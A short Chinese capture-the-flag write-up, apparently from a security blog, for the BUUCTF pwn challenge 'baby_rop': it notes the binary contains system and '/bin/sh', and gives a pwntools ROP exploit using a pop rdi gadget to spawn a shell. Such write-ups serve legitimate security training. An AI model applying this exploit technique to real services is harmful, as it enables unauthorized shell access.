BUUCTF pwn [HarekazeCTF2019]baby_rop

0x01 文件分析 BUUCTF pwn [HarekazeCTF2019]baby_rop
文章图片

?
0x02 运行 【BUUCTF pwn [HarekazeCTF2019]baby_rop】BUUCTF pwn [HarekazeCTF2019]baby_rop
文章图片

?一组回显
?
0x03 IDA BUUCTF pwn [HarekazeCTF2019]baby_rop
文章图片

BUUCTF pwn [HarekazeCTF2019]baby_rop
文章图片

?程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。
?
0x04 思路 ?简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag查找位置。
?
0x05 exp

from pwn import *p = process("./babyrop") #p = remote('node3.buuoj.cn', 27401)sys_addr = 0x0000000000400490 bin_sh = 0x0000000000601048 pop_rdi = 0x0000000000400683p.recvuntil('? ') p.sendline('a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))p.interactive()

一个简单的网络安全公众号,欢迎各位朋友们关注!
BUUCTF pwn [HarekazeCTF2019]baby_rop
文章图片

    推荐阅读